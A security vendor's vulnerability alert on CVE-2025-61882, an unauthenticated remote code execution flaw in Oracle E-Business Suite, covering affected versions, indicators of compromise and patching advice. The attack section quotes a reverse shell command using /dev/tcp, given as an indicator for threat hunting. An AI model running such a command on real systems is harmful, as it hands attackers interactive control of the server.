No items found.
Read the latest from Gartner!

Hadrian recognized in the Gartner® Hype Cycle™ for Security Operations, 2025!

Vulnerability Alerts
-
2
mins read
-
October 7, 2025

CVE-2025-61882: Unauthenticated Remote Code Execution in Oracle E-Business Suite

-
- -
CVE-2025-61882: Unauthenticated Remote Code Execution in Oracle E-Business Suite

A critical security vulnerability has been disclosed in the widely used Oracle E-Business Suite (EBS). Tracked as CVE-2025-61882 with a CVSS Base Score of 9.8 (Critical), this flaw affects versions 12.2.3 through 12.2.14. If successfully exploited, this exposure allows unauthenticated attackers to perform remote code execution (RCE) over a network without needing any user credentials. Given that the vulnerability is already accompanied by Indicators of Compromise (IOCs), organizations running affected versions should consider this an immediate, top-priority threat.

Summary

Vulnerability: Remote Code Execution (RCE) due to a flaw in BI Publisher Integration within Oracle Concurrent Processing.

CVE: CVE-2025-61882

Impact: Unauthenticated, remote code execution. Full compromise of the affected system and potential data loss or service disruption.

Affected Versions: Oracle E-Business Suite versions 12.2.3 through 12.2.14.

Severity: Critical, CVSS 9.8

Fix: Apply the necessary updates provided in Oracle's Security Alert. The October 2023 Critical Patch Update is a prerequisite.

How the attack works

The core of CVE-2025-61882 is a vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within EBS. The vulnerability resides in a network protocol endpoint that is accessible without authentication. An attacker can remotely exploit this weakness over a network without needing a valid username or password. This access allows the attacker to execute arbitrary code with the privileges of the affected service, leading to Remote Code Execution (RCE). Observed Indicators of Compromise (IOCs) suggest attackers are leveraging this flaw to establish outbound TCP connections, likely for a reverse shell (sh -c /bin/bash -i >& /dev/tcp// 0>&1), which grants interactive command-line access and complete control of the compromised server.

Exploitation in the wild

Oracle has released an advisory due to the severity of the threat, and associated IOCs confirm that threat actors are actively probing for and exploiting this exposure. Specific IP addresses (e.g., 200.107.207.26 and 185.181.60.11) and exploit files (referenced by SHA 256 hashes) point to active reconnaissance and execution attempts against internet-facing EBS instances. The simple, unauthenticated nature of the exploit makes automated scanning and mass exploitation trivial for cybercriminals.

What makes this so dangerous

This vulnerability combines several factors that elevate it to a top-tier security risk:

  • Critical CVSS score: A CVSS score of 9.8 signifies maximum severity, indicating the exploit is highly impactful and easily accessible.
  • Unauthenticated RCE: The attack requires no user credentials or interaction, meaning any internet-facing system running a vulnerable version is exposed to the threat.
  • Full system compromise: Successful exploitation results in Remote Code Execution, granting the attacker complete control over the affected Oracle EBS server.
  • Clear IOCs: The public existence of IOCs (including specific IP addresses and reverse shell commands) confirms this is not a theoretical threat but is being actively targeted in the wild.

Mitigation steps and best practices

The window of exposure is zero. Administrators must act immediately to secure their environments.

  1. Apply patches immediately: Oracle strongly recommends applying the updates provided in the Security Alert as soon as possible.
  2. Patch prerequisite: Ensure the October 2023 critical patch update is applied, as it is a prerequisite for the application of this Security Alert.
  3. Monitor for IOCs: Security teams must immediately check logs for activity associated with the provided IP addresses and look for signs of the reverse shell command to support hunting and containment.
  4. Restrict network access: Limit network access to the Oracle Concurrent Processing component and the BI Publisher Integration to only trusted internal networks or specific administrative hosts.

Continuous detection: Actively monitor internet-facing assets for newly emerging, unauthenticated exposures like this one to ensure a rapid response process is in place, shortening the window of opportunity for sophisticated attackers.

{{cta-demo}}

{{related-article}}

CVE-2025-61882: Unauthenticated Remote Code Execution in Oracle E-Business Suite

{{quote-1}}

,

{{quote-2}}

,

Related articles.

All resources

Vulnerability Alerts

CVE-2025-1220: Null byte trickery bypasses hostname allowlists in PHP

CVE-2025-1220: Null byte trickery bypasses hostname allowlists in PHP

Vulnerability Alerts

CVE-2025-53770: Unauthenticated RCE in SharePoint lets attackers drop web shells

CVE-2025-53770: Unauthenticated RCE in SharePoint lets attackers drop web shells

Vulnerability Alerts

What you need to know: OpenSSH RegreSSHion CVE-2024-6387

What you need to know: OpenSSH RegreSSHion CVE-2024-6387

Related articles.

All resources

Vulnerability Alerts

CVE‑2025‑9807: Time‑based SQL injection in the Events Calendar Wordpress plugin

CVE‑2025‑9807: Time‑based SQL injection in the Events Calendar Wordpress plugin

Vulnerability Alerts

CVE-2025-53690: Critical vulnerability in Sitecore leads to remote code execution

CVE-2025-53690: Critical vulnerability in Sitecore leads to remote code execution

Vulnerability Alerts

From REDACTED to Administrator: Unmasking Hidden Credentials via SSRF and Caddy's Keen Eye

From REDACTED to Administrator: Unmasking Hidden Credentials via SSRF and Caddy's Keen Eye

get a 15 min demo

Start your journey today

Hadrian’s end-to-end offensive security platform sets up in minutes, operates autonomously, and provides easy-to-action insights.

What you will learn

  • Monitor assets and config changes

  • Understand asset context

  • Identify risks, reduce false positives

  • Prioritize high-impact risks

  • Streamline remediation

The Hadrian platform displayed on a tablet.
Take the first step in the shoes of your adversary